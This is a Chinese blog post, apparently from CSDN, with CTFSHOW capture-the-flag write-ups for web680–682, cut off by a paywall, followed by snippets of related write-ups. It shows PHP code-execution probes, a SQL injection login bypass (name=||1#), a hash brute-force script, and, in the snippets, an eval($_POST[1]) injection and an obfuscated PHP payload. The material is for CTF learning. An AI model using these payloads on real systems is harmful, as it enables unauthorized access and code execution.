CTFSHOW大赛原题篇(web680-web695)

原创 已于 2022-03-02 10:26:37 修改 · 3.3k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ctf

于 2022-02-23 09:34:28 首次发布
本文分享了CTFSHOW大赛中的六个挑战,涉及SQL注入、字符编码绕过、文件上传漏洞、正则表达式绕过、SSRF攻击和代码执行技巧。通过实例演示如何利用这些技巧找到flag。

因为题目较多,所以很多地方写的比较简略,望师傅们谅解,祝大家变得更强!

CTFSHOW大赛原题篇

文章目录

web680

code=phpinfo();
先看下disable_function,有一堆过滤。并且open_basedir做了目录限制。
r然后看下当前目录下的文件
code=var_dump(scandir("."));
发现一个文件secret_you_never_know
直接访问就拿到flag了 。。。。。。(大无语)

web681

登录的时候抓个包,比如我们传name=123会返回sql语句
select count(*) from ctfshow_users where username = '123' or nickname = '123'
然后试了下单引号,发现会被吞。
那就试下反斜杠,
select count(*) from ctfshow_users where username = '123\' or nickname = '123\'
这样相当于执行
select count(*) from ctfshow_users where username = 'xxx'123\'
所以先整个万能密码
name=||1#
最终语句为
select count(*) from ctfshow_users where username = '||1#\' or nickname = '||1#\'
相当于
select count(*) from ctfshow_users where username = 'xxxxx‘||1#\'
然后就出flag了。
在这里插入图片描述

web682

通过hint拿到未加密的js
后面的其实很简单的,就是麻烦些
在这里插入图片描述

import hashlib
string="0123456789abcdef"
for i in string:
    for j in string:
        for k in string:
            for l in string:  
                aaa=i+j+k+l               
                out1 = hashlib.sha256(aaa).hexdigest()
                if(out1=='c578feba1c2e657dba129b4012ccf6a96f8e5f684e2ca358c36df13765da8400'):
                    print(aaa)
                if(out1=='f9c1c9536cc1f2524bc3eadc85b2bec7ff620bf0f227b73bcb96c1f278ba90dc'):
                    print(aaa)

得到ctfshow{592b9d77
在这里插入图片描述
得到ctfshow{592b9d77-9dda
在这里插入图片描述得到ctfshow{592b9d77-9dda-4e30
在这里插入图片描述
得到ctfshow{592b9d77-9dda-4e30-94a4
在这里插入图片描述
其实就是 base32,直接解码base32就可以了
得到ctfshow{592b9d77-9dda-4e30-94a4-5e64f4499a52}

import hashlib
string="0123456789abcdef"
for i in string:
     if hashlib.sha224(i).hexdigest()=='abd37534c7d9a2efb9465de931cd7055ffdb8879563ae98078d6d6d5'
最低0.47元/天 解锁文章
CTFSHOW大赛(web711-web725)
羽的博客
02-27 4412
文章目录web711web712web713web782web785web786web787web788web789 web711 扫描目录发现存在robots.txt,提示static/secretkey.txt 访问得到一串字符串ctfshow_love_you 然后进入正常的页面,有个登录和注册,随便注册个用户并且登录后,发现存在文件上传点。 但是上传php后缀的文件不解析,应该不是php写的了。 看下session,应该是一个jwt加密的。那就好说了,伪造一个admin用户,而且加密的秘钥应该就是刚
CTFSHOW大赛(web696-web710)
羽的博客
02-23 2149
文章目录web696web697web698web699web700web701web702web703web704web705web707web708web709web710 web696 下载源码是个django的框架。 web1里面的利用点很明显,存在一个ssrf 而在web2的app.py中存在ssti模板注入 所以我们的目的就是通过web1来访问web2,最终通过ssti达到rce的,目的。 在web1中我们想利用ssrf必须先得到token,也就是需要用admin登录。 所以我们要做的第一
CTFSHOW web680-780(大赛)
qq_37561898的博客
01-29 4431
ctfshow CTF ctfshow大赛
CTFSHOW大赛(web726-web740)
羽的博客
02-27 1254
web726 username=;eval($_POST[1]);phpinfo();// username=%00 同之前的web692 web727 自增绕过 $_=[];$_=$_.'';$_=$_[';'=='$'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;
ctfshow 大赛 680-695
blowed的博客
06-26 1815
ctfshow 大赛
ctfshow web入门 大赛 web680--web688
2301_81040377的博客
07-30 1010
不能使用的函数是这些但是还是可以看文件的看根目录啥也没有看当前目录或者直接访问下载文件。
ctfshow 大赛 web689--web695
2301_81040377的博客
08-01 1479
path这里可以写入文件这里的%26是但是如果直接写的话不能正确的绕过,必须写url形式写马方便。
ctfshow 大赛 web697--web700
2301_81040377的博客
08-01 747
先扫一下,其实也可以不用扫因为什么也扫不出来这里看到有一个参数尝试一下数组随便输了,出了验证回显抓个包看这三个md5加密可以自带引号。
CTFSHOW大赛(web756-web770)
羽的博客
03-04 1463
因为目较多,所以很多地方写的比较简略,望师傅们谅解。。 文章目录web756web757web758web759web760web761web762web782web785web786web787web788web789 web756 code=GLOBALS web757 每次传入的key前七个字符需要是上传返回的,并且substr(md5($value),5,4)==0) 因为不是每一次md5都有可能字母开头,所以我们需要多测试几次,直接在给的key后面不断加字符就可以了。 import reque
CTFSHOW大赛(web771-web790)
羽的博客
03-04 1228
因为目较多,所以很多地方写的比较简略,望师傅们谅解。。 暂时先更新到这了,毕竟还是要工作的。。。。 文章目录web771web773web774web775web776web 777web778web779web780web781web782web784web785web786web787web788web789web790 web771 GXYCTF2019 你的名字 目过滤了{{}} 只要使用就直接报错,所以只能用{%%}进行盲注了 然后也过滤了一些字符,但是只是替换成空了。所以可以直接往想使用的字
ctfshow-大赛-web702
最新发布
Rsecret2的博客
04-18 1095
我们的思路就是包含一个css文件,这个css文件是压缩到phar中的,那么如何绕过文件上传必须是PNG的限制呢,就可以手动赋值一个文件头。(我们发现这两次的cookie签名值是不同的),如果签名值是不同的那么我们添加theme参数的时候就会让我们重新登录无法进行命令执行了。现在我们需要考虑的是我们怎么凑才能把data这个消息也就是咱们cookie "." 前面的字符串是72位以上呢?这样就可以执行了,我错误的因呢就是拿到最初登录时候给的$signature来拼接了。// www.zip 下载源码。
ctf.show大赛(web680-681)
wanan的博客
08-31 462
ctf.show大赛(web680-681)
CTFShow-大赛改编(未完慢慢更)
paidx0
04-24 3102
文章目录web680web681web682web683web684 create_function()web685web686(无参RCE)姿势一 getallheaders()姿势二 get_defined_vars()姿势三 session_id()web687web688 escapeshellcmd()web689 ssrfmeweb690web691order by 的一个盲注小技巧web692web693web694web695web696web697web698web711web71
CTFSHOW大赛(web741-web755)
羽的博客
02-28 1120
因为目较多,所以很多地方写的比较简略,望师傅们谅解。。 文章目录web741web742web743web744web745web750web782web785web786web787web788web789 web741 ssrf绕过 url=http://0.0.0.0:8080/flag web742 web743 a[]=1&b[]=2&c[]=1&d[]=2 web744 <?php class ctfshowCURL{ private $url="file:/
CTFshow web(php命令执行 68-71)
csjjjd的博客
02-13 1333
直接输出根目录的位置,然后查看源代码,发现flag位置为flag.txt。还是那句话,没看到flag在哪,那就优先找到flag位置。知道flag在根目录下面的flag.txt直接访问就好了。这里c=var_dump(scandir("/"));先把上payload看看能不能白嫖啊。// 你们在炫技吗?
[ctfshow web入门-大赛]web785-800(部分)
weixin_45751765的博客
06-17 1518
ctfshow web入门大赛 乱序写写 有新做的就补上去吧 稍微刷几个做的人比较少的heihei 顺便记录一下参考羽师傅的文章 brain.md: test文件夹覆盖掉软连接 test文件夹中的内容会写入来test软连接对应的目录 我们动手实测一下 先在uploads目录下建立一个test软连接 然后在别的地方建立一个test文件夹里面随便放个东西 将test文件夹mv至uploads目录下 可以发现软连接所指向的目录多出了test文件夹里存放的东西 niubi 又学到了 zip --symlin
CTFshow 命令执行 web67
Kradress的博客
12-03 413
目录源码思路解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_POST
ctfshow-web670-php权限维持
2301_81476211的博客
04-04 264
不死马/内存马 php 权限维持
ctfshow 权限维持 web670--web679
2301_81040377的博客
07-30 558
之后直接啥都没了,应该是打入不死🐎应该可以但是需要看看有么有权限写入可以那么我们上马这样子写入了先访问一下url/a.php让不死🐎开始运行再而看看shell.php是不是已经生成了生成过后check,flag就被生成了即可。
ctfshow大赛
08-09
CTFShow大赛是指比赛中涉及到的各种目类型,包括但不限于密码学、网络安全、逆向工程、Web安全、二进制漏洞等。这些目旨在考察选手的技术能力和解能力,挑战他们的思维和创新能力。 目设计...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值